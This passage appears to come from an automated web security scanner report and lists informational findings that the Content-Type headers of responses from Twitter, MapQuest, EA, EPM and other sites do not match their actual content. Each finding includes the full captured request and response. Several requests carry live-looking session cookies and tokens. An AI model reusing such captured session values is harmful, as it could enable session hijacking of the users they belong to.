29.28. http://twitter.com/favorites/xobni.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://twitter.com
Path:   /favorites/xobni.json

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /favorites/xobni.json?callback=TWTR.Widget.receiveCallback_1&since_id=84119584793313280&refresh=true&include_rts=true&clientsource=TWITTERINC_WIDGET&1308935081143=cachebust HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1308571866345827; guest_id=13086187569807267; js=1; external_referer=Bm9gjDJKLkMCmTGfXi%2Fo4fSNTngTGWZb0S9qzLzLKytyYNzFWm%2B%2F%2F6n0FbfbkHoIM9Z5WpSyRcI%3D%7C0; __utmz=43838368.1308923300.10.3.utmcsr=support.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/app/answers/detail/a_id/4394; __utma=43838368.1598605414.1305368954.1308913365.1308923300.10; original_referer=ZLhHHTiegr%2FfNsM7YNGN6Zfmt5dI%2BSKI; _twitter_sess=BAh7CDoHaWQiJThiOGIwNDk5NjY3NDBkY2ViYzhjYTc1NTBkM2JiNzc3Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsInUecwjAB--d77c3886c53ad3aa67b938c34cc53fa63d97d495

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:05:05 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308935105-86874-45123
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Fri, 24 Jun 2011 17:05:05 GMT
X-RateLimit-Remaining: 146
X-Runtime: 0.02318
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114508b243d
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 98fcfca0bbe8c4a8295ba9fffd4fd7d1c793bf80
X-RateLimit-Reset: 1308938679
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Content-Length: 34
Connection: close

TWTR.Widget.receiveCallback_1([]);
29.29. http://v360.mqcdn.com/sv/ac/coverages.mercator.jsonp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://v360.mqcdn.com
Path:   /sv/ac/coverages.mercator.jsonp

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /sv/ac/coverages.mercator.jsonp HTTP/1.1
Host: v360.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 16 Feb 2011 14:54:57 GMT
Vary: Accept-Encoding
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Accept-Ranges: bytes
Cteonnt-Length: 67897
Content-Type: text/plain
Content-Length: 67897
Cache-Control: max-age=86400
Expires: Sat, 25 Jun 2011 14:15:24 GMT
Date: Fri, 24 Jun 2011 14:15:24 GMT
Connection: close

MQA.StreetView360IO.CALLBACKS.coverages([{'comment': '', 'coverage_bounds': {'upper_left_longitude': -170.0, 'scale_ranges': {'max': 1000, 'min': 88011773}, 'upper_left_latitude': 70.0, 'zoom_ranges':
...[SNIP]...
29.30. http://v360.mqcdn.com/sv/ac/styling.mercator.jsonp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://v360.mqcdn.com
Path:   /sv/ac/styling.mercator.jsonp

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /sv/ac/styling.mercator.jsonp HTTP/1.1
Host: v360.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 22 Mar 2011 11:29:25 GMT
Vary: Accept-Encoding
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Accept-Ranges: bytes
Cteonnt-Length: 4617
Content-Type: text/plain
Content-Length: 4617
Cache-Control: max-age=86400
Expires: Sat, 25 Jun 2011 14:15:24 GMT
Date: Fri, 24 Jun 2011 14:15:24 GMT
Connection: close

MQA.StreetView360IO.CALLBACKS.styling({'level_based': [{'opacity': 2, 'outline_thickness': 5, 'outline_color': '#fe6c01', 'fill_color': '#fe6c01', 'level': 0, 'geometry_type': 'vector', 'overlay_type'
...[SNIP]...
29.31. http://videogamevoters.org/ext/jquery/jquery-bsdNoConflict.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://videogamevoters.org
Path:   /ext/jquery/jquery-bsdNoConflict.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ext/jquery/jquery-bsdNoConflict.js HTTP/1.1
Host: videogamevoters.org
Proxy-Connection: keep-alive
Referer: http://videogamevoters.org/page/s/raiseyourvoice
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jljaemke=B82E653654DADA390F78AB527FA85CD6; exp_last_visit=993577424; __utmz=27825467.1308923027.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27825467.253868994.1308923027.1308923027.1308923027.1; __utmc=27825467; __utmb=27825467.1.10.1308923027; mw-sc-soon=visited; PHPSESSID=9d712ec099019f18fde151f161211342; exp_last_activity=1308937444; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fmodal%2Fsc-soon%2F%22%3B%7D; X-CheckNode=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/javascript
Date: Fri, 24 Jun 2011 13:44:05 GMT
ETag: "a88886-29-4a66a51be1ac0"
Set-Cookie: X-CheckNode=; domain=videogamevoters.org; path=/
Last-Modified: Fri, 24 Jun 2011 00:31:15 GMT
X-Cache-Info: caching
Content-Length: 41

window.bQuery = jQuery.noConflict(true);
29.32. http://videogamevoters.org/page/-/js/sys_regular.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://videogamevoters.org
Path:   /page/-/js/sys_regular.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /page/-/js/sys_regular.js HTTP/1.1
Host: videogamevoters.org
Proxy-Connection: keep-alive
Referer: http://videogamevoters.org/eacorp/?topicId=11341
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-CheckNode=; X-Mapping-jljaemke=B82E653654DADA390F78AB527FA85CD6

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/plain; charset=ISO-8859-1
Date: Fri, 24 Jun 2011 13:41:35 GMT
Keep-Alive: timeout=3, max=98
Last-Modified: Wed, 11 Aug 2010 19:27:21 GMT
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 25012

/*!
* The following copyright notice may not be removed under any circumstances.
*
* Copyright:
* Copyright (c) Fabrizio Schiavi - http://www.fsd.it/, 2002. All rights reserved.
*
* Trademark:
...[SNIP]...
29.33. http://videogamevoters.org/page/spud  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://videogamevoters.org
Path:   /page/spud

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

POST /page/spud?hash=8025 HTTP/1.1
Host: videogamevoters.org
Proxy-Connection: keep-alive
Referer: http://videogamevoters.org/page/s/raiseyourvoice
Content-Length: 102
Origin: http://videogamevoters.org
X-Requested-With: BSD AJAX, revision 12/8/2005
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jljaemke=B82E653654DADA390F78AB527FA85CD6; exp_last_visit=993577424; __utmz=27825467.1308923027.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27825467.253868994.1308923027.1308923027.1308923027.1; __utmc=27825467; __utmb=27825467.1.10.1308923027; mw-sc-soon=visited; PHPSESSID=9d712ec099019f18fde151f161211342; exp_last_activity=1308937444; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fmodal%2Fsc-soon%2F%22%3B%7D; X-CheckNode=

type=getm&field=email%2Cfirstname%2Clastname%2Caddr1%2Caddr2%2Ccity%2Cstate_cd%2Czip%2Ccountry%2Cphone

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 24 Jun 2011 13:44:14 GMT
Set-Cookie: spud=9YPeARXTg2SgZ1KgU3RMd6f3; expires=Sun, 23-Jun-2013 13:44:14 GMT; path=/; domain=videogamevoters.org
Set-Cookie: X-CheckNode=; domain=videogamevoters.org; path=/
Content-Length: 145

200
{"email":null,"firstname":null,"lastname":null,"addr1":null,"addr2":null,"city":null,"state_cd":null,"zip":null,"country":null,"phone":null}
29.34. http://videogamevoters.org/utils/locale/load_locale.ajax.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://videogamevoters.org
Path:   /utils/locale/load_locale.ajax.php

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /utils/locale/load_locale.ajax.php?country=undefined&region=null&region_id=state_cd HTTP/1.1
Host: videogamevoters.org
Proxy-Connection: keep-alive
Referer: http://videogamevoters.org/page/s/raiseyourvoice
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jljaemke=B82E653654DADA390F78AB527FA85CD6; exp_last_visit=993577424; __utmz=27825467.1308923027.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mw-sc-soon=visited; PHPSESSID=9d712ec099019f18fde151f161211342; exp_last_activity=1308937444; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fmodal%2Fsc-soon%2F%22%3B%7D; __utma=27825467.253868994.1308923027.1308923027.1308923027.1; __utmc=27825467; __utmb=27825467.2.10.1308923027; spud=7T8zXsh5sehRSvWg38fFd6f3; X-CheckNode=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/json
Date: Fri, 24 Jun 2011 13:44:16 GMT
Set-Cookie: X-CheckNode=; domain=videogamevoters.org; path=/
Content-Length: 65

{"select_html":null,"use_zip":true,"region_postal_exceptions":[]}
29.35. http://web-static.ea.com/us/portal/images/icon_downloads.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://web-static.ea.com
Path:   /us/portal/images/icon_downloads.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /us/portal/images/icon_downloads.png?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
Last-Modified: Tue, 22 Jun 2010 23:17:49 GMT
ETag: "865883-78a-489a6a134a140"
Accept-Ranges: bytes
Content-Length: 1930
Content-Type: image/png
Date: Fri, 24 Jun 2011 13:43:45 GMT
Connection: close

......JFIF.............C...............
.

       
...............%...#... , #&')*)..-0-(0%()(...C....
.
.

.(...((((((((((((((((((((((((((((((((((((((((((((((((((......5.J.."..............................
...[SNIP]...
29.36. http://web-static.ea.com/us/portal/images/icon_music.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://web-static.ea.com
Path:   /us/portal/images/icon_music.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /us/portal/images/icon_music.png?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
Last-Modified: Tue, 22 Jun 2010 23:17:49 GMT
ETag: "5d0a46-731-489a6a134a140"
Accept-Ranges: bytes
Content-Length: 1841
Content-Type: image/png
Date: Fri, 24 Jun 2011 13:43:45 GMT
Connection: close

......JFIF.............C...............
.

       
...............%...#... , #&')*)..-0-(0%()(...C....
.
.

.(...((((((((((((((((((((((((((((((((((((((((((((((((((......5.J.."..............................
...[SNIP]...
29.37. http://web-static.ea.com/us/portal/images/icon_photo.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://web-static.ea.com
Path:   /us/portal/images/icon_photo.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /us/portal/images/icon_photo.png?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
Last-Modified: Tue, 22 Jun 2010 23:25:47 GMT
ETag: "28020f-675-489a6bdb254c0"
Accept-Ranges: bytes
Content-Length: 1653
Content-Type: image/png
Date: Fri, 24 Jun 2011 13:43:45 GMT
Connection: close

......JFIF.............C...............
.

       
...............%...#... , #&')*)..-0-(0%()(...C....
.
.

.(...((((((((((((((((((((((((((((((((((((((((((((((((((......5.J.."..............................
...[SNIP]...
29.38. http://web-static.ea.com/us/portal/images/icon_video.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://web-static.ea.com
Path:   /us/portal/images/icon_video.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /us/portal/images/icon_video.png?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
Last-Modified: Tue, 22 Jun 2010 23:17:49 GMT
ETag: "a7d93e-6ab-489a6a134a140"
Accept-Ranges: bytes
Content-Length: 1707
Content-Type: image/png
Date: Fri, 24 Jun 2011 13:43:45 GMT
Connection: close

......JFIF.............C...............
.

       
...............%...#... , #&')*)..-0-(0%()(...C....
.
.

.(...((((((((((((((((((((((((((((((((((((((((((((((((((......5.J.."..............................
...[SNIP]...
29.39. http://www.asiawebdirect.com/customer/enquiry/template/en/lang_txt.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.asiawebdirect.com
Path:   /customer/enquiry/template/en/lang_txt.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /customer/enquiry/template/en/lang_txt.js HTTP/1.1
Host: www.asiawebdirect.com
Proxy-Connection: keep-alive
Referer: http://www.asiawebdirect.com/customer/enquiry/?s=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=eb3a6bec00673164f453d878a92a4208; __utmx=191982906.00014641700566752900:4:1; __utmxx=191982906.00014641700566752900:3251620:2592000; s_cc=true; s_sq=%5B%5BB%5D%5D; PHPSESSID=941fc14748dad06bb4deeadf1081ff50

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:27 GMT
Server: Apache/2.2.17
Last-Modified: Tue, 13 Oct 2009 01:56:54 GMT
ETag: "82a-475c75c47e580"
Accept-Ranges: bytes
Cache-Control: max-age=86400, public
Expires: Sat, 25 Jun 2011 13:22:27 GMT
Vary: Accept-Encoding
Content-Length: 2090
Content-Type: application/javascript

lang_txtDetail_0 = "If your property is already working with us and you need to send up updates, <br>closeouts or urgent issues please make sure you contact your account manager <br>or our client serv
...[SNIP]...
29.40. http://www.ea.com/json/user-menu  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ea.com
Path:   /json/user-menu

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /json/user-menu?returnUrl=http%3A%2F%2Fwww.ea.com%2F1%2Fproduct-eulas&_=1308923169682 HTTP/1.1
Host: www.ea.com
Proxy-Connection: keep-alive
Referer: http://www.ea.com/1/product-eulas
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%252528openPositionedWindow%252528%252527http%25253A//www.info.ea.com%252527%25252C%25252520%252527info%252527%25252C%25252520780%25252C%25252520800%25252C%252525200%25252C%252525200%25252C%25252520t%2526ot%253DA%26eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:46:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 639
Content-Type: text/html; charset=utf-8

{"html":"<div id=\"mod-user-menu\">\n\t<div class=\"mod-header\"><\/div>\n\t<div class=\"mod-content\">\n\t\t<div class=\"content\">\n\t\t\t<ul>\n\t\t\t<li class=\"login\" title=\"Login\"><a href=\"ht
...[SNIP]...
29.41. http://www.epm.com.co/epm/web/_admincom/diccionario/_admincom_dict_lista.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.epm.com.co
Path:   /epm/web/_admincom/diccionario/_admincom_dict_lista.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /epm/web/_admincom/diccionario/_admincom_dict_lista.html HTTP/1.1
Host: www.epm.com.co
Proxy-Connection: keep-alive
Referer: http://www.epm.com.co/epm/web/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=6211303.1308934761.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=6211303.1146028634.1308934761.1308934761.1308934761.1; __utmc=6211303; __utmb=6211303.2.10.1308934761

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 43619
Date: Thu, 23 Jun 2011 15:10:05 GMT
Content-Type: text/html
ETag: "787e7b83d590cb1:5897"
Server: Microsoft-IIS/6.0
Accept-Ranges: bytes
Last-Modified: Tue, 30 Nov 2010 21:28:21 GMT
X-Powered-By: ASP.NET
Vary: Accept-Encoding

<ul id="lista_terminos">
   <li><a href="accesorios.html">Accesorios</a></li>
<li><a href="ACEITEDIELECTRICO.html">
    Aceite diel..ctrico</a></li>
<li>
    <a href="acometida.html">Acometida</a></l
...[SNIP]...
29.42. http://www.epm.com.co/epm/web/_admincom/menuinstitucional2.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.epm.com.co
Path:   /epm/web/_admincom/menuinstitucional2.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /epm/web/_admincom/menuinstitucional2.html HTTP/1.1
Host: www.epm.com.co
Proxy-Connection: keep-alive
Referer: http://www.epm.com.co/epm/web/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=6211303.1308934761.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=6211303.1146028634.1308934761.1308934761.1308934761.1; __utmc=6211303; __utmb=6211303.2.10.1308934761

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 2921
Date: Fri, 24 Jun 2011 16:57:11 GMT
Content-Type: text/html
ETag: "b6157ddd92acc1:5897"
Server: Microsoft-IIS/6.0
Accept-Ranges: bytes
Last-Modified: Tue, 14 Jun 2011 21:27:29 GMT
X-Powered-By: ASP.NET
Vary: Accept-Encoding

<ul id="navmenu-v">
<li><a href="http://www.epm.com.co/epm/web/acercade/epm_acercade.html">Acerca de EPM</a></li>
<li><a href="#">Servicio al Cliente</a>
<ul>
<li><a href="http://w
...[SNIP]...
29.43. http://www.epm.com.co/epm/web/_assets/code/multihistorias.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.epm.com.co
Path:   /epm/web/_assets/code/multihistorias.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /epm/web/_assets/code/multihistorias.js HTTP/1.1
Host: www.epm.com.co
Proxy-Connection: keep-alive
Referer: http://www.epm.com.co/epm/web/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=6211303.1308934761.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=6211303.1146028634.1308934761.1308934761.1308934761.1; __utmc=6211303; __utmb=6211303.2.10.1308934761

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 108
Date: Fri, 24 Jun 2011 14:55:06 GMT
Content-Type: application/x-javascript
ETag: "15f8aa76aa9cc1:5897"
Server: Microsoft-IIS/6.0
Accept-Ranges: bytes
Last-Modified: Tue, 03 May 2011 15:55:02 GMT
X-Powered-By: ASP.NET

$('#hist_fondo_titulos').find('a.boton_ver_mas').text('');
$('div.vermas').find('a').text('');
fixImgLink();
29.44. http://www.epm.com.co/epm/web/_assets/code/redes_sociales.cfg.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.epm.com.co
Path:   /epm/web/_assets/code/redes_sociales.cfg.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /epm/web/_assets/code/redes_sociales.cfg.html HTTP/1.1
Host: www.epm.com.co
Proxy-Connection: keep-alive
Referer: http://www.epm.com.co/epm/web/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=6211303.1308934761.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=6211303.1146028634.1308934761.1308934761.1308934761.1; __utmc=6211303; __utmb=6211303.2.10.1308934761

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 391
Date: Fri, 24 Jun 2011 09:49:51 GMT
Content-Type: text/html
ETag: "80caead0ee6acb1:5897"
Server: Microsoft-IIS/6.0
Accept-Ranges: bytes
Last-Modified: Wed, 13 Oct 2010 15:53:45 GMT
X-Powered-By: ASP.NET
Vary: Accept-Encoding

<ul>
   <li><a href="http://www.youtube.com/user/EPMColombia">YouTube</a></li>
   <li><a href="http://www.caminoalbarrio.tv/">Camino al Barrio</a></li>
   <li><a href="http://www.facebook.com/pages/EPM-e
...[SNIP]...
29.45. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

